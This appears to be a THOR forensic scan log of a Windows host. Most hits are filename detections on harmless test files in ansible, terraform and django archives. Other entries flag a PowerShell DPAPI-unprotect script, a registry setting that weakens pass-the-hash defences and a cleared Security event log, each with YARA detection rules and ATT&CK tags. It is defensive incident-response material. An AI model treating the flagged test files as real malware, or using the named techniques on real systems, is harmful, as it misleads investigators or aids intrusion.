SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 18
|
Sep 10 12:28:59 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip\ansible-devel\test\integration\targets\module_precedence\roles_with_extension\foo\library\a.py
EXT:
.py
TYPE:
UNIX SCRIPT
SIZE:
191
FIRSTBYTES:
23212f7573722f62696e2f707974686f6e0a6672 / #!/usr/bin/python fr
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Mon Jul 29 01:24:54.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 19
|
Sep 10 12:29:14 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\funcs\testdata\hello.tmpl
EXT:
.tmpl
TYPE:
UNKNOWN
SIZE:
15
FIRSTBYTES:
48656c6c6f2c20247b6e616d657d21 / Hello, ${name}!
MODIFIED:
Mon Jul 29 11:07:37.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\terraform-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
9103146
ARCHIVE_MD5: 1b21be3bad334b290996069e4162ada4
ARCHIVE_SHA1: 20037437fde7bd949d85a738583d415744d09b95
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f220fd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:25:20.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \hello.tmp
SUBSCORE_1:
50
REF_1:
RAT - https://twitter.com/obfusor/status/1538783112145928192
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 20
|
Sep 10 12:29:14 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\testdata\functions-test\hello.tmpl
EXT:
.tmpl
TYPE:
UNKNOWN
SIZE:
15
FIRSTBYTES:
48656c6c6f2c20247b6e616d657d21 / Hello, ${name}!
MODIFIED:
Mon Jul 29 11:07:37.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\terraform-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
9103146
ARCHIVE_MD5: 1b21be3bad334b290996069e4162ada4
ARCHIVE_SHA1: 20037437fde7bd949d85a738583d415744d09b95
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f220fd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:25:20.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \hello.tmp
SUBSCORE_1:
50
REF_1:
RAT - https://twitter.com/obfusor/status/1538783112145928192
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 21
|
Sep 10 12:29:14 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\testdata\functions-test\subdirectory\hello.tmpl
EXT:
.tmpl
TYPE:
UNKNOWN
SIZE:
15
FIRSTBYTES:
48656c6c6f2c20247b6e616d657d21 / Hello, ${name}!
MODIFIED:
Mon Jul 29 11:07:37.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\terraform-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
9103146
ARCHIVE_MD5: 1b21be3bad334b290996069e4162ada4
ARCHIVE_SHA1: 20037437fde7bd949d85a738583d415744d09b95
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f220fd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:25:20.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \hello.tmp
SUBSCORE_1:
50
REF_1:
RAT - https://twitter.com/obfusor/status/1538783112145928192
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 22
|
Sep 10 12:30:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\a.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 23
|
Sep 10 12:30:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\b.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 24
|
Sep 10 12:30:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\c\d.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 25
|
Sep 10 12:30:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\c\e.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 26
|
Sep 10 12:30:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\c\f\g.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 27
|
Sep 10 12:30:05 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\migrations\test_migrations_clashing_prefix\a.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
83
FIRSTBYTES:
66726f6d20646a616e676f2e646220696d706f72 / from django.db impor
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 28
|
Sep 10 12:31:09 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip\ansible-devel\.azure-pipelines\commands\i.sh
EXT:
.sh
TYPE:
UNIX SCRIPT
SIZE:
393
FIRSTBYTES:
23212f7573722f62696e2f656e7620626173680a / #!/usr/bin/env bash
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Tue Aug 6 16:22:44.712 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:44.934 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 29
|
Sep 10 12:31:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip\ansible-devel\test\integration\targets\module_precedence\lib_with_extension\a.py
EXT:
.py
TYPE:
UNIX SCRIPT
SIZE:
180
FIRSTBYTES:
23212f7573722f62696e2f707974686f6e0a6672 / #!/usr/bin/python fr
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Tue Aug 6 16:22:44.712 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:44.934 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 30
|
Sep 10 12:31:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip\ansible-devel\test\integration\targets\module_precedence\roles_with_extension\foo\library\a.py
EXT:
.py
TYPE:
UNIX SCRIPT
SIZE:
191
FIRSTBYTES:
23212f7573722f62696e2f707974686f6e0a6672 / #!/usr/bin/python fr
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Tue Aug 6 16:22:44.712 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:44.934 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 31
|
Sep 10 12:31:34 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\funcs\testdata\hello.tmpl
EXT:
.tmpl
TYPE:
UNKNOWN
SIZE:
15
FIRSTBYTES:
48656c6c6f2c20247b6e616d657d21 / Hello, ${name}!
MODIFIED:
Mon Jul 29 11:07:37.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\terraform-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
9103146
ARCHIVE_MD5: 1b21be3bad334b290996069e4162ada4
ARCHIVE_SHA1: 20037437fde7bd949d85a738583d415744d09b95
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f220fd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:46.731 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:47.216 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \hello.tmp
SUBSCORE_1:
50
REF_1:
RAT - https://twitter.com/obfusor/status/1538783112145928192
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 32
|
Sep 10 12:31:34 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\testdata\functions-test\hello.tmpl
EXT:
.tmpl
TYPE:
UNKNOWN
SIZE:
15
FIRSTBYTES:
48656c6c6f2c20247b6e616d657d21 / Hello, ${name}!
MODIFIED:
Mon Jul 29 11:07:37.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\terraform-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
9103146
ARCHIVE_MD5: 1b21be3bad334b290996069e4162ada4
ARCHIVE_SHA1: 20037437fde7bd949d85a738583d415744d09b95
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f220fd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:46.731 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:47.216 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \hello.tmp
SUBSCORE_1:
50
REF_1:
RAT - https://twitter.com/obfusor/status/1538783112145928192
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 33
|
Sep 10 12:31:34 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\terraform-main.zip\terraform-main\internal\lang\testdata\functions-test\subdirectory\hello.tmpl
EXT:
.tmpl
TYPE:
UNKNOWN
SIZE:
15
FIRSTBYTES:
48656c6c6f2c20247b6e616d657d21 / Hello, ${name}!
MODIFIED:
Mon Jul 29 11:07:37.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\terraform-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
9103146
ARCHIVE_MD5: 1b21be3bad334b290996069e4162ada4
ARCHIVE_SHA1: 20037437fde7bd949d85a738583d415744d09b95
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f220fd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:46.731 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:40.806 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:47.216 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \hello.tmp
SUBSCORE_1:
50
REF_1:
RAT - https://twitter.com/obfusor/status/1538783112145928192
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Notice 34
|
Sep 10 12:44:09 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
50
FILE:
E:\Windows\System32\WindowsPowerShell\v1.0\Modules\Carbon\Cryptography\Unprotect-String.ps1
EXT:
.ps1
TYPE:
UNKNOWN
SIZE:
2368
FIRSTBYTES:
2320436f70797269676874203230313220416172 / # Copyright 2012 Aar
CREATED:
Tue Jun 24 23:29:44.000 2014
MODIFIED:
Tue Jun 24 23:29:44.000 2014
ACCESSED:
Tue Jul 23 12:57:34.038 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule SUSP_PS_Unprotect_ProtectedData / Detects a suspicious Unprotect statement for ProtectedData in PowerShell code
SUBSCORE_1:
50
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2018-11-15
TAGS_1:
SCRIPT, SUSP, T1059, T1059_001
RULENAME_1: SUSP_PS_Unprotect_ProtectedData
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Notice 35
|
Sep 10 12:44:47 WIN-LRTT94FA08M/10.100.5.12
MODULE:
RegistryHive
MESSAGE:
Notable registry hive entries found
ENTRY:
ROOT\Microsoft\Windows\CurrentVersion\Policies\System;LocalAccountTokenFilterPolicy;1
SCORE:
55
PATH:
E:\Windows\System32\config\SOFTWARE
KEY:
ROOT\Microsoft\Windows\CurrentVersion\Policies\System
MODIFIED:
Tue Sep 3 12:20:55 2024
REASON_1:
YARA rule PTH_Weak_LocalAccountTokenFilterPolicy / Detects reg key allows all local admin group members to logon remotely with highest privileges
SUBSCORE_1:
55
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2017-03-16
TAGS_1:
REG, T1112, T1550_002
RULENAME_1: PTH_Weak_LocalAccountTokenFilterPolicy
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Notice 36
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Evil Event ID
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
1102
EVENT_LEVEL:
4
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 10:11:04 2024
DESC:
Security Log deleted
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: SYSTEM SubjectDomainName: NT AUTHORITY SubjectLogonId: 999 ClientProcessId: 2040 ClientProcessStartKey: 4785074604081773 Provider_Name: Microsoft-Windows-Eventlog Provider_Guid: {fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148} EventID: 1102 Version: 1 Level: 4 Task: 104 Opcode: 0 Keywords: 4620693217682128896 TimeCreated_SystemTime: 1.7253582649479408e+09 EventRecordID: 143904 Execution_ProcessID: 2160 Execution_ThreadID: 8740 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
50
|
Notice 37
|
Sep 10 13:13:10 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Report
MESSAGE:
Thor Scan finished
END_TIME:
Tue Sep 10 13:13:10 2024
ALERTS:
3
WARNINGS:
57
NOTICES:
36
ERRORS:
0
|